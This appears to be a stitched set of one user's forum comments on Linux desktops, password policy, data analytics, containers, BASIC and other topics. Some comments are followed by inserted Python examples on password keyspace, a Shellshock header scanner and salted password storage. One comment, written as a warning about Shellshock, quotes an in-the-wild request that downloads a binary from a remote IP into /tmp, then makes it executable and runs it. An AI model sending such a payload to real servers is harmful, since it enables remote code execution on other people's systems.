"Something maybe rough around the edges but usable and exciting enough to use as daily desktop?"
Yup, that's pretty much the definition of Enlightenment
I love the Terminology terminal emulator and wish it was easier to install on non-Enlightenment distros.
Using Perl pretty much covers all nine and then some.
Except, perhaps, for #5 Yo-yo code. That is actually a built-in feature.
Ditto.
BTW, does anybody know what the opposite of TL;DR is?
The new glorious world of big data and data analytics has one small problem. Just because you have a ton of data doesn't mean that there is any useful information in it. Really, what are companies going to be able to glean from such a database? That some people's heart rate goes up when they drive? Which means what?
Insurance companies are the original big data users. Actuarial science is all based on the premise that it is possible to predict the likely outcome for an individual through the statistical analysis of the larger group. They have been doing this quite successfully/profitably since the 1700s. There is a definite point of diminishing return between increased revenue by identifying higher risk individuals and the costs associated with implementing those programs. If it costs $1 million to implement you would need to identify 10,000 people and charge them an extra $100 just to break even. If they can find a competitor whose rate is less than that $100 increase and leave then you start losing money, and not just the $100 but the original premium as well.
A lot of people are under the misconception that all they need to do is gather data and they will then be able to sell it. But the data has to be useful and I just don't see it in this case.
Single factor authentication (i.e. password) is a people problem. If access to a site is granted by matching an identifier with one other piece of information, then it is the risk created by the compromise of those credentials that should govern how "strong" those credentials need to be.
Financial information? Strong. Personal Health information? Strong. Email? Depends on how interesting you are. Hardware store loyalty points? Meh.
The more important point from the article is this:
"In fact, research from Microsoft/University of California at Berkeley/University of British Columbia (paper titled Does My Password Go Up to Eleven? The Impact of Password Meters on Password Selection) found that indeed, password gauges do encourage users to concoct stronger passwords."
Warn/shame people that their passwords suck and they are likely to do better.
(And interestingly enough, mathematically a site that insists on an 8 character password with at least one each of upper/lower case letters, numbers and special characters produces less secure passwords than a site that insists on 8 characters that can be any of those.)
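The keyspace claim in the comment above can be checked by counting, shown here as an added example that is not part of the original comment. It assumes the 94 printable ASCII characters split into four classes and counts candidate strings only, not how people actually choose passwords; the function names are hypothetical.

```python
from itertools import combinations, product
from math import log2
import string

# Assumed character classes: 26 + 26 + 10 + 32 = 94 printable ASCII symbols.
CLASSES = [string.ascii_lowercase, string.ascii_uppercase,
           string.digits, string.punctuation]


def unrestricted_count(class_sizes, length):
    """Every string of `length` over the union of all classes."""
    return sum(class_sizes) ** length


def all_classes_count(class_sizes, length):
    """Strings with at least one character from EVERY class.

    Inclusion-exclusion: start from all strings, subtract those missing
    one class, add back those missing two, and so on.
    """
    total = sum(class_sizes)
    count = 0
    for k in range(len(class_sizes) + 1):
        for excluded in combinations(class_sizes, k):
            count += (-1) ** k * (total - sum(excluded)) ** length
    return count


def brute_force_count(classes, length):
    """Enumerate every string; only feasible for tiny alphabets.
    Used to cross-check the closed-form count above."""
    alphabet = "".join(classes)
    hits = 0
    for candidate in product(alphabet, repeat=length):
        if all(any(ch in cls for ch in candidate) for cls in classes):
            hits += 1
    return hits


def policy_comparison(length=8):
    """Compare 'any of the 94 characters' with 'one of each class required'."""
    sizes = [len(c) for c in CLASSES]
    free = unrestricted_count(sizes, length)
    forced = all_classes_count(sizes, length)
    return {
        "unrestricted": free,
        "composition_rule": forced,
        "fraction_remaining": forced / free,
        "bits_lost": log2(free) - log2(forced),
    }


if __name__ == "__main__":
    for key, value in policy_comparison().items():
        print(f"{key}: {value}")
```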
Maybe something like Tracks
or any of the other pre-packaged issue trackers from turnkeylinux.org
If you are unfamiliar with the work of Clifford Simak I strongly suggest that you give him a try. What I have always loved is that there is so much that is just unknown going on in his stories. No great heroes, no great battles, just a lot of "what the hell is going on here?"
His last book "Highway of Eternity" is great and "Ring around the Sun" has always been a favorite as well. Most of his stuff is a short quick read and is easily found in your favorite used book store (you do have one I hope).
At a minimum read the novel synopsis over at Wikipedia to get a glimpse of a very interesting author.
And lest we forget, Gene and Majel Roddenberry have passed as well.
A great resource for situations like this is Turnkey Linux (http://www.turnkeylinux.org). They host a wide variety of fully built server images that make it easy to try out a number of systems to see what best fits your need. You can download and fire up well known CMS like Drupal or Plone and see if they fit the need or not. Then if there is something they like they can load the ISO on a bare metal box and go.
Pythagoras imposed his quasi-religious philosophies... about never urinating towards the sun...
That was a translation error. What he actually said is you don't piss against the wind.
Where are my mod points when I need them!
Really people? Your lives are so fascinating that you need to keep the details away from the digital paparazzi? Mine sure isn't.
Here is my take on what is going on here. First, the government doesn't care. Have you heard about the huge number of people arrested for having pictures on Facebook showing drug use? No? Well that is because it's not a threat to the greater good and not worth the time and effort to prosecute. Not even a cursory email saying to clean up your act or we will send you a more strongly worded email. Many of us may have dissident thoughts but we don't do dissident acts and are mostly harmless. So that leaves the Big Business boogie man with a financial motive. In the beginning there was the trifecta of terror, the credit rating agencies. They, with their magical patented Fair Isaac scoring formula, have claimed for years that those numbers offer a glimpse into a person's soul. And they basically market it as such even when the intended use is based more on correlation than causation. As evidence I present the recent use of credit scores by insurance companies. My credit score has never been affected by my driving history, so why should my car insurance rates be based on my credit score? In my case I was given the option of allowing it or not. Allowing it could have saved me as much as 3%!, or cost me more, in any case the amount did not benefit me enough to make it worth my while. Same with the followup offer to install their OBD digital spy.
There are a bunch of people who think they can make a fortune collecting other people's data. Reality is that most of that data is mundane garbage that has very little value to it. Much like the millions and millions of credit card numbers that have been compromised. Collecting the information is easy, monetizing it is hard.
I can't shake the feeling that I've seen this movie before, I think it was called "statically linked executables" where all the code needed to run the application resided in one place. Then as the executables got more complex they got much larger, consumed more resources, and large parts of each executable were redundant with each other. Hence static executables were superseded by "dynamically linked executables" which pulled out the redundancies into general purpose libraries that existed in only one place which led to DLL version hell. So now we have containers which allow an application to be bundled up with just the code it needs to execute.
And yes, containers have more capabilities than simply isolating the code. However I would argue that code isolation is the primary use of containers.
I have a prediction, that by the end of 2015 we will see one of the container vendors offer a version that allows for "code sharing" between a master image and the individual containers in order to cut down on redundancy. Full Circle++.
Luke: Is the dark side stronger?
Yoda: No, no, no. Quicker, easier, more seductive.
In so many subject areas you have the option of the quick and easy way or the more thorough slog through the fundamentals. Unfortunately, when you are young, the long term advantages of mastering the fundamentals are lost when compared to the short term gratification of getting an assignment done.
There have been many discussions here on Slashdot regarding the issues caused by people who do not understand the fundamentals of their jobs. Coders who cannot code efficiently because they do not understand what makes code inefficient or efficient or how to test for potential improvements. Personally I am aghast at the number of web developers I have run into who are clueless when it comes to networking. Since they have libraries and frameworks for that they don't feel the need to personally understand it. Don't even get me started on the horrible, horrible SQL queries I have seen. There is only so much optimization that can be done on the backend by the optimizing routines written by people who do know the fundamentals.
In the end, too many students seem to not understand the purpose of an "Education" and have confused it with its simpler cousin, "Job training".
1) ignorant bit torrent user who doesn't know how to configure their software to play nice in public
2) ignorant free wifi supplier who doesn't know how to configure their router for QOS
3) ignorant noob who relies on there being free wifi in order to do his job
There is a reason I've used this sig for years.
The steel construction of the Model M is a thing of beauty. And the weight keeps the cat from knocking it off my desk.
I was in Carmel, Indiana, a northern Indianapolis suburb, last week. Since the 1990s they have been replacing all of the main intersections with roundabouts. They have over 60 of them now.
While roundabouts have been proven to be safer for average drivers, how easy are they for autonomous vehicles to navigate vs your standard intersection? Is a roundabout an asset to the adoption of autonomous vehicles, a hindrance or a wash?
There is evidence that this is being exploited in the wild.
Nginx and Apache servers using mod_cgi are two potentially vulnerable services.
The risk is that it is possible to modify environment variables which then could allow the execution of arbitrary code with the permissions of the parent process.
An example attack:
GET./.HTTP/1.0 .User-Agent:.Thanks-Rob .Cookie:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
Over at the Internet Storm Center http://isc.sans.org/ they have been updating their advisory and have a simple one-liner to test if a system is vulnerable.
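For defenders reviewing captured requests, the pattern in the comment above (a header value that begins like a shell function definition and ends up in a CGI environment variable) can be flagged with a short scanner. This is an added example, not part of the original comment and not the ISC one-liner; the sample requests are constructed, carry a harmless `echo`, and the function name is hypothetical.

```python
import re
from urllib.parse import unquote

# CGI copies request headers into HTTP_* environment variables; a value
# starting with "() {" is what the vulnerable parser treated as a function.
# Whitespace between "()" and "{" varies between observed requests.
FUNC_DEF = re.compile(r"\(\)\s*\{")

# Constructed sample requests (not captured traffic).
REQ_BENIGN = ("GET /cgi-bin/status HTTP/1.0\r\n"
              "Host: www.example.test\r\n"
              "User-Agent: Mozilla/5.0\r\n"
              "Cookie: session=abc123\r\n\r\n")
REQ_COOKIE = ("GET / HTTP/1.0\r\n"
              "User-Agent: constructed-sample\r\n"
              "Cookie: () { :; }; echo constructed-marker\r\n\r\n")
REQ_UA = ("GET / HTTP/1.0\r\n"
          "User-Agent: (){ :;}; echo constructed-marker\r\n\r\n")
REQ_QUERY = ("GET /cgi-bin/status?q=%28%29%20%7B%20%3A%3B%20%7D%3B HTTP/1.0\r\n"
             "Host: www.example.test\r\n\r\n")


def suspicious_fields(raw_request):
    """Return (field, value) pairs that carry a function-definition prefix.

    Checks the percent-decoded request line (it feeds QUERY_STRING and
    friends) and every header value up to the blank line ending the headers.
    """
    lines = raw_request.replace("\r\n", "\n").split("\n")
    hits = []

    request_line = unquote(lines[0])
    if FUNC_DEF.search(request_line):
        hits.append(("request-line", request_line))

    for line in lines[1:]:
        if not line:            # blank line: end of headers, body ignored
            break
        name, sep, value = line.partition(":")
        if not sep:             # malformed header line, nothing to inspect
            continue
        value = value.strip()
        if FUNC_DEF.search(value):
            hits.append((name.strip().lower(), value))
    return hits


if __name__ == "__main__":
    for label, req in [("benign", REQ_BENIGN), ("cookie", REQ_COOKIE),
                       ("user-agent", REQ_UA), ("query", REQ_QUERY)]:
        print(label, suspicious_fields(req))
```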
It's getting harder and harder to find Gopher servers.
sdf.org to the rescue!
gopher://phlogosphere.org
Hey Zuck! There is a whole army of non-US Ivy league MBAs who will be more than happy to produce the same BS as Joe Green for a fraction of the cost. Don't you want to work with the "Best"? Doesn't Joe Green want you to?
If one of our sites was down for as long as Adobe's was, heads would roll.
What took so long to restore? Crappy process for restoring server images or recovering a database?
Or, as others have speculated, was there a security breach and they couldn't bring it back up until all the evidence was gathered and the vulnerability was closed.
Oh wait, this is Adobe we are talking about. Their code doesn't have vulnerabilities.
LISP - Lots of InSipid Parenthesis
Surprised at the number of hateful comments regarding BASIC. Even when it was created it was aimed at novices not experts, hence the name: Beginner's All-purpose Symbolic Instruction Code. The true value was that the simple syntax made learning programming concepts much simpler. I used to teach a beginning programming class in the '80s that used BASIC. I always felt that I was able to instill a better understanding of what was going on with the simple Line # VERB parameter syntax of the early language. Breaking things down to only four Verb types (Definition, Assignment, I/O, Control), the operators, and the two types of variables/constants (string/numeric). That's all there is folks. Would I want to try and write a compiler in it, no, but that is not what the language was written for.
Dinosaur trivia points: why do loops commonly use the variable i? (Hint: int does not stand for index.)
Puzzles, puzzles and more puzzles! Number puzzles, word puzzles, shape puzzles! Tangram! Origami!
Things that make you think! Things that give you a sense of accomplishment when completed! Things that make you feel as smart as you are!
Because...
somehow I don't think that a group of people looking for government subsidies for their healthcare represent the best targets for identity fraud.
I hate studies like this. Do people pick common passwords, of course they do. Does everyone pick an easy to guess password, of course not. Can it be blindly determined, for any given user, if their password is "simple" or "complex"? No.
The article puts the blame on the end user, when the truth is the problem is with the websites storing the passwords in plain text or as un-salted hashes and not locking out brute force attacks. What the researchers are really arguing is that
1) your account may be compromised if hackers break into the website and steal all the passwords.
2) your password might be easier to guess if it is related to you, hackers are targeting you personally (not likely), and the website doesn't lock the account out.
Don't blame the user, blame the developers and administrators for being lazy and/or inept and failing to protect people from themselves.
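The server-side controls the comment above says are missing (per-user salts, a slow hash, lockout after repeated failures) fit in a small credential store. This is an added example, not part of the original comment; the class name, the lockout threshold and the PBKDF2 round count are assumptions chosen for illustration.

```python
import hashlib
import hmac
import os

MAX_FAILURES = 5          # assumed lockout threshold
PBKDF2_ROUNDS = 100_000   # assumed work factor for this demonstration


def unsalted_hash(password):
    """The weak scheme: identical passwords give identical stored values,
    so one precomputed table covers every account in a stolen database."""
    return hashlib.sha256(password.encode()).hexdigest()


class CredentialStore:
    def __init__(self):
        self._records = {}    # user -> (salt, derived key)
        self._failures = {}   # user -> consecutive failed attempts

    @staticmethod
    def _derive(password, salt):
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt,
                                   PBKDF2_ROUNDS)

    def register(self, user, password):
        salt = os.urandom(16)  # fresh random salt per account
        self._records[user] = (salt, self._derive(password, salt))
        self._failures[user] = 0

    def stored_key(self, user):
        """What an attacker would see after stealing the table."""
        return self._records[user][1]

    def login(self, user, password):
        if user not in self._records:
            return "denied"
        if self._failures[user] >= MAX_FAILURES:
            return "locked"    # online guessing stops here
        salt, key = self._records[user]
        # Constant-time comparison avoids leaking how many bytes matched.
        if hmac.compare_digest(key, self._derive(password, salt)):
            self._failures[user] = 0
            return "ok"
        self._failures[user] += 1
        return "denied"


if __name__ == "__main__":
    store = CredentialStore()
    store.register("alice", "letmein")   # constructed sample accounts
    store.register("bob", "letmein")
    print(unsalted_hash("letmein") == unsalted_hash("letmein"))    # same
    print(store.stored_key("alice") == store.stored_key("bob"))    # differ
    for guess in ["a", "b", "c", "d", "e"]:
        store.login("alice", guess)
    print(store.login("alice", "letmein"))
```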